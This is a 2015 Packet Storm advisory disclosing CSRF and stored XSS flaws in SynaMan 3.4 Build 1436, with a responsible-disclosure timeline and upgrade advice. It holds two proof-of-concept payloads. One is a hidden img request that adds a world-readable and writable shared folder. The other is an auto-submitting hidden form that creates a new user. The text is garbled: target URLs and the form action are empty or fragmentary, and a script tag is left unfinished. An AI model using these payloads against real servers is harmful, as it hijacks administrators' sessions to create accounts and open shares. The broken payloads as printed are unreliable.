SynaMan 3.4 Build 1436 CSRF / Cross Site Scripting

Type packetstorm
Reporter Marlow Tannhauser
Modified 2015-05-08T00:00:00


                                            `# Exploit Title: Multiple vulnerabilities in SynaMan 3.4 Build 1436 (CSRF/Stored XSS)  
# Date: 07-05-2015  
# Exploit Author: Marlow Tannhauser  
# Contact:  
# Vendor Homepage:  
# Software Link:  
# Version: 3.4 Build 1436. Earlier versions may also be affected.  
# CVE: 2015-3140  
# Category: Web apps  
08/02/2015: Initial disclosure to vendor and CERT  
09/02/2015: Acknowledgment of vulnerabilities from vendor  
11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor  
19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request  
09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request  
20/04/2015: Confirmation of fix from vendor  
07/05/2015: Disclosure  
Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage.  
SynaMan 3.4 Build 1436 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests.  
# POC 1 #  
The following PoC uses the CSRF vulnerability together with one of the stored XSS vulnerabilities, to create a new shared folder in the application.  
<img src="\&publicRead=1&publicWrite=1&operation=mngFolders&st=addFolder" alt="" width="1" height="1">  
# POC 2 #  
The following PoC uses the CSRF vulnerability to create a new user with the details shown.  
<form name="evilform" method="post" action="">  
<input type="hidden" name="fullName" value="marlow"/>  
<input type="hidden" name="login" value="" />  
<input type="hidden" name="password" value="marlow" />  
<input type="hidden" name="operation" value="mngUsers" />  
<input type="hidden" name="st" value="saveUser" />  
<input type="hidden" name="oldLogin" value="" />  
<input type="hidden" name="modifyUser" value="false" />  
<script type="text/javascript">  
Stored XSS vulnerabilities are present in the following fields:  
Managing Shared Folders > Shared folder name field  
Example URL:\&publicRead=1&publicWrite=1&operation=mngFolders&st=addFolder  
Manage Users > Add a new user > User's name field and Email/Login field  
Example URL: POST request  
Advanced Configuration > Partial Branding > Main heading field and Sub heading field  
Affects all users on all pages, pre and post authentication  
Example URL: POST request  
Discovery Wizard > Discovery Service Signup > One-Word name  
Example URL:  
Upgrade to the latest build of SynaMan, available from the link shown.